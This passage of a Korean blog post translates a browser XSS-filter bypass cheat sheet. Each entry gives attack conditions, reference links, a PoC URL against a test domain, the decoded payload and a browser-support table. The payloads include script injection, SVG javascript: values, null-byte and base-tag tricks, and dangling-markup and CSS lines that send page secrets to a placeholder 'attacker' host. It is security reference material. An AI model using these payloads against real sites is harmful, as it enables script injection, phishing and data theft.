href=\"https:\/\/vulnerabledoma.in\/bypass\/text?mime=unknown&amp;q=%3C?xml%20version=%221.0%22?%3E%3Cscript%20xmlns=%22http:\/\/www.w3.org\/1999\/xhtml%22%3Ealert(1)%3C\/script%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?mime=unknown&amp;q=%3C?xml%20version=%221.0%22?%3E%3Cscript%20xmlns=%22http:\/\/www.w3.org\/1999\/xhtml%22%3Ealert(1)%3C\/script%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?xml version=\"1.0\"?&gt;&lt;script xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\"&gt;alert(1)&lt;\/script&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p><strong>\ub2e4\uc74c\uc740 \uc2a4\ud06c\ub9bd\ud2b8\uc758 \uc2e4\ud589\uc740 \ubd88\uac00\ub2a5\ud558\uc9c0\ub9cc \uc545\uc6a9\uc758 \uac00\ub2a5\uc131\uc774 \uc874\uc7ac\ud558\ub294 \uae30\ubc95\uc784<\/strong><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#https%E3%83%AA%E3%83%B3%E3%82%AF%E3%81%AE%E4%BD%9C%E6%88%90\"><\/a>http(s):\ub9c1\ud06c \ub9cc\ub4e4\uae30<\/h3>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Ca%20href=https:\/\/attacker\/%3ESession%20expired.%20Please%20login%20again.%3C\/a%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Ca%20href=https:\/\/attacker\/%3ESession%20expired.%20Please%20login%20again.%3C\/a%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;a href=https:\/\/attacker\/&gt;Session expired. Please login again.&lt;\/a&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E5%A4%96%E9%83%A8%E3%81%AB%E3%83%AA%E3%82%AF%E3%82%A8%E3%82%B9%E3%83%88%E3%82%92%E9%80%81%E4%BF%A1%E3%81%A7%E3%81%8D%E3%82%8B%E3%82%BF%E3%82%B0\"><\/a>\uc678\ubd80\ub85c Request\ub97c \ub9cc\ub4e4 \uc218 \uc788\ub294 \ud0dc\uadf8<\/h3>\n\n\n\n<p>\ub530\uc74c\ud45c \ud55c\ucabd\uc744 \ub2eb\uc9c0 \uc54a\uc740 img \ud0dc\uadf8\ub97c \uc774\uc6a9\ud574 \uc678\ubd80\ub85c Request\ub97c \ud560 \ub54c \uadf8 \ub0b4\uc6a9\uc5d0 \ube44\ubc00 \uc815\ubcf4\ub97c \ud3ec\ud568\uc2dc\ud0ac \uc218 \uc788\uc74c<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?type=8&amp;q=%3Cimg%20src=%22https:\/\/attacker\/?data=\">https:\/\/vulnerabledoma.in\/bypass\/text?type=8&amp;q=%3Cimg%20src=%22https:\/\/attacker\/?data=<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;p&gt;&lt;img src=\"https:\/\/attacker\/?data=&lt;\/p&gt;\n&lt;p&gt;This is a secret text.&lt;\/p&gt;\n&lt;p id=\"x\"&gt;AAA&lt;\/p&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E4%BB%BB%E6%84%8F%E3%81%AEcss%E3%81%AE%E8%A8%98%E8%BF%B0\"><\/a>\uc784\uc758\uc758 CSS \uc2e4\ud589<\/h3>\n\n\n\n<p>\ud398\uc774\uc9c0\uc758 \ub0b4\uc6a9\uc744 \ubaa8\ubc29\ud560 \ubfd0\ub9cc \uc544\ub2c8\ub77c \ud398\uc774\uc9c0 \ub0b4\uc5d0 \uc911\uc694\ud55c \uc815\ubcf4\uac00 \ub2f4\uaca8\uc788\uc744 \ub54c CSS\ub9cc\uc744 \uc0ac\uc6a9\ud574 \uc815\ubcf4\ub97c \ud0c8\ucde8\ud560 \uc218 \uc788\uc74c \uc790\uc138\ud55c \ub0b4\uc6a9\uc740 URL \ucc38\uace0.<\/p>\n\n\n\n<p>\ucc38\uace0URL:<\/p>\n\n\n\n<ul><li><a href=\"http:\/\/www.businessinfo.co.uk\/labs\/talk\/The_Sexy_Assassin.ppt\">http:\/\/www.businessinfo.co.uk\/labs\/talk\/The_Sexy_Assassin.ppt<\/a><\/li><li><a href=\"https:\/\/masatokinugawa.l0.cm\/2015\/10\/css-based-attack-abusing-unicode-range.html\">https:\/\/masatokinugawa.l0.cm\/2015\/10\/css-based-attack-abusing-unicode-range.html<\/a><\/li><\/ul>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cstyle%3E@import%20%27\/\/attacker\/test.css%27%3C\/style%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cstyle%3E@import%20%27\/\/attacker\/test.css%27%3C\/style%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;style&gt;@import '\/\/attacker\/test.css'&lt;\/style&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Clink%20rel=stylesheet%20href=\/\/attacker\/test.css%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Clink%20rel=stylesheet%20href=\/\/attacker\/test.css%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;link rel=stylesheet href=\/\/attacker\/test.css&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E3%83%90%E3%82%A4%E3%83%91%E3%82%B9\"><\/a>\ud544\ud130 \uc6b0\ud68c<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#svg%E3%82%A2%E3%83%8B%E3%83%A1%E3%83%BC%E3%82%B7%E3%83%A7%E3%83%B3%E3%81%AEvalues%E5%B1%9E%E6%80%A7%E3%81%AE%E5%88%A9%E7%94%A8safari%E3%81%AE%E3%81%BF\"><\/a>SVG \uc560\ub2c8\uba54\uc774\uc158 \ud6a8\uacfc\uc758 values \uc18d\uc131\uc744 \uc0ac\uc6a9<\/h3>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac <\/li><\/ol>\n\n\n\n<p>\ucc38\uace0URL:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=709365\">https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=709365<\/a><\/li><li><a href=\"https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=738017\">https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=738017<\/a><\/li><\/ul>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Csvg%20xmlns:xlink=http:\/\/www.w3.org\/1999\/xlink%3E%3Canimate%20xlink:href=%23x%20attributeName=%22xlink:href%22%20values=%22%26%23x3000%3Bjavascript:alert(1)%22%20\/%3E%3Ca%20id=x%3E%3Crect%20width=100%20height=100%20\/%3E%3C\/a%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Csvg%20xmlns:xlink=http:\/\/www.w3.org\/1999\/xlink%3E%3Canimate%20xlink:href=%23x%20<br>attributeName=%22xlink:href%22%20values=%22%26%23&#215;3000%3Bjavascript:alert(1)%22%20\/%3E%3Ca%20id=x%3E%3Crect%20width=<br>100%20height=100%20\/%3E%3C\/a%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;svg xmlns:xlink=http:\/\/www.w3.org\/1999\/xlink&gt;&lt;animate xlink:href=#x attributeName=\"xlink:href\" values=\"\u3000javascript:alert(1)\" \/&gt;<br>&lt;a id=x&gt;&lt;rect width=100 height=100 \/&gt;&lt;\/a&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>O<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>FireFox\uc5d0\uc11c\ub294 values=&#8221;javascript:alert(1)&#8221; \ub85c \uc8fc\uba74 \uc6b0\ud68c\uac00 \uac00\ub2a5\ud568<\/p><\/blockquote>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E8%A4%87%E6%95%B0%E3%81%AEnull%E6%96%87%E5%AD%97%E3%81%AE%E5%88%A9%E7%94%A8safari%E3%81%AE%E3%81%BF\"><\/a>\uc5ec\ub7ec\uac1c\uc758 null\ubb38\uc790\ub97c \uc0ac\uc6a9<\/h3>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>null \ubc14\uc774\ud2b8\uac00 \ucd9c\ub825\uc774 \ub428<\/li><li>\ud398\uc774\ub85c\ub4dc\uc758 \ubc14\ub85c \uc55e\uc5d0 \uacf5\ubc31\ubb38\uc790\uac00 \uc874\uc7ac\ud558\uc9c0 \uc54a\uc74c<\/li><\/ol>\n\n\n\n<p>\ucc38\uace0URL:<\/p>\n\n\n\n<ul><li><a href=\"http:\/\/web.archive.org\/web\/20170923174234\/https:\/\/twitter.com\/0rbz_\/status\/896896095862669312\">https:\/\/twitter.com\/0rbz_\/status\/896896095862669312<\/a><\/li><\/ul>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%00%00%00%00%00%00%00%3Cscript%3Ealert(1)%3C\/script%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%00%00%00%00%00%00%00%3Cscript%3Ealert(1)%3C\/script%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">[0x00][0x00][0x00][0x00][0x00][0x00][0x00]&lt;script&gt;alert(1)&lt;\/script&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>O<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#script%E3%82%BF%E3%82%B0%E5%86%85%E3%81%AE--%E3%81%AB%E3%82%88%E3%82%8B%E3%82%B3%E3%83%A1%E3%83%B3%E3%83%88%E3%81%AE%E5%88%A9%E7%94%A8safari%E3%81%AE%E3%81%BF\"><\/a>script\ud0dc\uadf8\uc758 &#8211;&gt; \uc8fc\uc11d\uc744 \uc0ac\uc6a9<\/h3>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac <\/li><li>\ud398\uc774\ub85c\ub4dc\uc758 \ub4a4\uc5d0 \uac1c\ud589\ubb38\uc790\uac00 \uc5c6\uc774 script\ud0dc\uadf8\ub97c \ub2eb\uc74c<\/li><\/ol>\n\n\n\n<p>\ucc38\uace0URL:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=753307\">https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=753307<\/a><\/li><\/ul>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?type=9&amp;q=%3Cscript%3Ealert(1)%0A--%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?type=9&amp;q=%3Cscript%3Ealert(1)%0A&#8211;%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;div&gt;&lt;script&gt;alert(1)\n--&gt;&lt;\/div&gt;&lt;script src=\/test.js&gt;&lt;\/script&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>O<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E5%8D%8A%E7%AB%AF%E3%81%AAbase%E3%82%BF%E3%82%B0%E3%81%AE%E5%88%A9%E7%94%A8safari%E3%81%AE%E3%81%BF\"><\/a> \uc5b4\uc911\uac04\ud55c base \ud0dc\uadf8\uc758 \uc0ac\uc6a9 <\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#flash%E3%81%AE%E5%88%A9%E7%94%A8\"><\/a>Flash \uc0ac\uc6a9<\/h4>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac  <\/li><li>\ud398\uc774\ub85c\ub4dc\uc758 \ubc14\ub85c \ub4a4\uc5d0 \uacf5\ubc31\ubb38\uc790 \ud639\uc740 &#8216;, &#8221; \uac00 \uc874\uc7ac<\/li><li>\uacf5\uaca9 \ud0c0\uac9f\uc774 flash\ub97c \uc774\uc6a9 \uac00\ub2a5<\/li><\/ol>\n\n\n\n<p>\ucc38\uace0URL:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/masatokinugawa.l0.cm\/2016\/05\/xss8.html\">https:\/\/masatokinugawa.l0.cm\/2016\/05\/xss8.html<\/a><\/li><\/ul>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p>(\ubc14\ub85c \ub4a4\uc5d0 \uacf5\ubc31\uc774 \uc5c6\ub294 \uacbd\uc6b0)<br><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?type=3&amp;q=%3Cembed%20allowscriptaccess=always%20src=\/xss.swf%3E%3Cbase%20href=\/\/l0.cm\/\">https:\/\/vulnerabledoma.in\/bypass\/text?type=3&amp;q=%3Cembed%20allowscriptaccess=always%20src=\/xss.swf%3E%3Cbase%20href=\/\/l0.cm\/<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;div&gt;&lt;embed allowscriptaccess=always src=\/xss.swf&gt;&lt;base href=\/\/l0.cm\/&lt;\/div&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>(\ubc14\ub85c \ub4a4\uc5d0 \uacf5\ubc31\uc774 \uc788\ub294 \uacbd\uc6b0)<br><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?type=4&amp;q=%3Cembed%20allowscriptaccess=always%20src=\/xss.swf%3E%3Cbase%20href=%22\/\/l0.cm\/\">https:\/\/vulnerabledoma.in\/bypass\/text?type=4&amp;q=%3Cembed%20allowscriptaccess=always%20src=\/xss.swf%3E%3Cbase%20href=%22\/\/l0.cm\/<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;div&gt; &lt;embed allowscriptaccess=always src=\/xss.swf&gt;&lt;base href=\"\/\/l0.cm\/ &lt;\/div&gt;&lt;div id=\"x\"&gt;&lt;\/div&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E7%9B%B8%E5%AF%BEurl%E3%81%A7%E3%83%AD%E3%83%BC%E3%83%89%E3%81%97%E3%81%A6%E3%81%84%E3%82%8B%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%88%E3%81%AE%E5%88%A9%E7%94%A8\"><\/a>\uc0c1\ub300\uacbd\ub85c\ub85c js\ud30c\uc77c\uc744 \ub85c\ub4dc\ud558\ub294 \uc2a4\ud06c\ub9bd\ud2b8 \uc0ac\uc6a9<\/h4>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>\ud398\uc774\ub85c\ub4dc\uc758 \ubc14\ub85c \ub4a4\uc5d0 \uacf5\ubc31\ubb38\uc790 \ud639\uc740 &#8216;, &#8220;\uac00 \uc874\uc7ac<\/li><li>\ud398\uc774\ub85c\ub4dc\uc758 \ubc14\ub85c \ub4a4\uc5d0 \uc0c1\ub300\uacbd\ub85c\ub85c js\ud30c\uc77c\uc744 \ub85c\ub4dc\ud568<\/li><\/ol>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?type=9&amp;q=%3Cbase%20href=\/\/cors.l0.cm\/\">https:\/\/vulnerabledoma.in\/bypass\/text?type=9&amp;q=%3Cbase%20href=\/\/cors.l0.cm\/<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;div&gt;&lt;base href=\/\/cors.l0.cm\/&lt;\/div&gt;&lt;script src=\/test.js&gt;&lt;\/script&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>O<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a 